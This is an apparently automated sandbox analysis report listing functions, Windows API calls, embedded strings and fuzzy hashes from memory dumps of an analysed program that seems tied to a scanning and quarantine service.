                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                          • String ID: SetDllDirectoryW$kernel32.dll
                          • API String ID: 3184163350-3826188083
                          • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                          • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                          • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                          • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$AllocProcesslstrlen
                          • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                          • API String ID: 3424473247-996641649
                          • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                          • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                          • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                          • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: String$ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1775797328-0
                          • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                          • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                          • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                          • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                          APIs
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                          • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                          • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                          • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                          • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 1232609184-0
                          • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                          • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                          • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                          • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                          • String ID: H
                          • API String ID: 2107338056-2852464175
                          • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                          • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                          • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                          • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                          • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                          • API String ID: 1322048431-2685357988
                          • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                          • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                          • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                          • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeaveTimerWaitable
                          • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                          • API String ID: 2984211723-3002863673
                          • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                          • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                          • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                          • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CloseHandleMultipleObjectsOpenProcessWait
                          • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                          • API String ID: 678758403-4129911376
                          • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                          • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                          • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                          • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$AllocProcesslstrlen
                          • String ID:
                          • API String ID: 3424473247-0
                          • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                          • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                          • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                          • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                          • String ID: bad exception$csm$csm$csm
                          • API String ID: 3766904988-820278400
                          • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                          • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                          • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                          • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                          • String ID:
                          • API String ID: 2707001247-0
                          • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                          • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                          • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                          • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                          • Instruction ID: f172bdc5f73e449fe22b4ca8eb7e602253b338a857e64e537f9f58a667ba64e2
                          • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                          • Instruction Fuzzy Hash: 08D172B6A087818AEB219F75D8883AD77A0FB45788F180275DECD67B55CF38E481CB00
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$FreeProcess
                          • String ID:
                          • API String ID: 3859560861-0
                          • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                          • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                          • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                          • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$FreeProcess
                          • String ID:
                          • API String ID: 3859560861-0
                          • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                          • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                          • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                          • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: AddressFreeLibraryProc
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3013587201-537541572
                          • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                          • Instruction ID: f872ed3915c46412b5a7056c10331bf194239ad08fe46f68028e30889c0d7464
                          • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                          • Instruction Fuzzy Hash: AB41E3A9B19A8241EA17CF36DCA86BE2391BF45B90F0C4575DDCE67794EE3CE4058300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                          • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                          • API String ID: 1119674940-1966266597
                          • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                          • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                          • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                          • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$AllocProcesslstrlen$ComputerName
                          • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                          • API String ID: 3702919091-996641649
                          • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                          • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                          • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                          • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                          APIs
                          • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                          • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$Info
                          • String ID:
                          • API String ID: 1775632426-0
                          • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                          • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                          • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                          • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B071B1
                          • GetLastError.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B071BF
                          • LoadLibraryExW.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B071E9
                          • FreeLibrary.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B07257
                          • GetProcAddress.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B07263
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                          • Instruction ID: 6069a76703338e71bc357b6cfdeb1e6e31bf4d903b99e0accc154aecbe81b5b9
                          • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                          • Instruction Fuzzy Hash: 4431F6A9F196C191EE139F22DC4967DA394BF49B60F1D0674ED9D2B790EE3CE4418300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Value$ErrorLast
                          • String ID:
                          • API String ID: 2506987500-0
                          • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                          • Instruction ID: 82347751c762d2673507ebcd4d9e0fee8e4ac203de02dc9e233f38cbd6292d22
                          • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                          • Instruction Fuzzy Hash: 902160A8B0C6C245F967AF31DDDD13D61519F987B0F0C06B4E9FE266E6EE2CA4418300
                          APIs
                          Strings
                          Memory Dump Source
